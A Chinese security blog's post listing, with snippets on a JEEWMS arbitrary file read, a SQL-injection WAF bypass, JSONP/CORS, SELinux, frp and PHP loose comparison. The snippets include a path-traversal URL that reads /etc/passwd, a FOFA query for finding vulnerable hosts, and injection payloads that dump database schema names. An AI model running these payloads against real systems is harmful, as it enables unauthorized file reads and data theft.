- 博客(9)
- 收藏
- 关注
RSS订阅原创 JEEWMS 任意文件读取漏洞
http://ip/systemController/showOrDownByurl.do?down=&dbPath=…/…/…/…/…/…/etc/passwdFOFA:body=“plug-in/lhgDialog/lhgdialog.min.js?skin=metro”
2024-03-12 09:29:29
543
2
原创 jsonp与CORS
这是一个docker hfish蜜罐搭建引发,搭建完成后蜜罐记录的攻击源ip都是本地网关,找到了相似问题的解决办法【JSONP漏洞结合蜜罐】(https://blog.csdn.net/qq_42746827/article/details/109652508),然后开始研究jsonp…(前端名堂还真不少,代码嗯看)更:后面又接触到广告cookie追踪,又回到跨域了
2023-01-11 10:20:22
394
原创 一次安全狗绕过
http://115.159.97.35/sqli-labs-master/Less-1/?id=1安全狗绕过参考 https://www.cnblogs.com/Yang34/p/12055052.html?id=1' order/*!99999asd*/by 3 --+?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
2021-07-15 16:48:19
333
原创 centos7搭建httpd服务遇到的问题
centos7搭建httpd服务遇到的问题1.权限,更改根目录后权限不足无法访问:网站根目录是否可读,其全部父目录是否可读。根目录的SELinux文件上下文,具体看我另一个相似问题博客:https://blog.csdn.net/weixin_45490166/article/details/117902527。可以通过ls -Z查看默认根目录/var/www等的SELinux相关参数进行更改。-----分割线----------分割线----------分割线----------分割线---
2021-06-15 20:47:47
718
原创 frp配置实现转发多个http站点
在网上找了半天,都是千篇一律:frps.ini正常配置(包括加vhost_http_port或者没有加vhost_http_port),frpc.ini多加几个[web]项,这些都没指出重点所在,我尝试了均连接失败【问题所在】记得将新加的[web]项type改为tcp,后面也不用加域名或者ip。frp会直接将其当作tcp数据包处理,只处理到了传输层(tcp),而没有到应用层(http)。【解决】frps.ini:frpc.ini:【运行过程猜测】两端frp程序运行并连接成功后,服务端
2021-06-14 23:09:42
10836
21
原创 【已解决】systemctl启动失败问题,日志提示权限不足
frp的 systemctl 启动失败查看事件日志:journalctl --since="2021-06-14 13:10:00" --until="..."错误原因:权限不足但是,root运行同样提示权限不足注意日志中【SELinux is …】对于 SELinux,可以这么理解,它是部署在 Linux 上用于增强系统安全的功能模块传统的 Linux 系统中,默认权限是对文件或目录的所有者、所属组和其他人的读、写和执行权限进行控制,这种控制方式称为自主访问控制(DAC)方式;而在 SE
2021-06-14 13:56:52
7004
6
原创 php弱类型变量比较
php弱类型变量比较php弱类型变量是指,在声明一个变量时,我们不需要指明它保存的数据类型。php数据类型:String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)。==、!=:在进行比较的时候,会先将字符串类型转化成相同,再比较。`<?phpvar_dump("admin"==0); //truevar_dump("1admin"==1); //truevar_dump(
2021-05-13 16:39:14
412
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人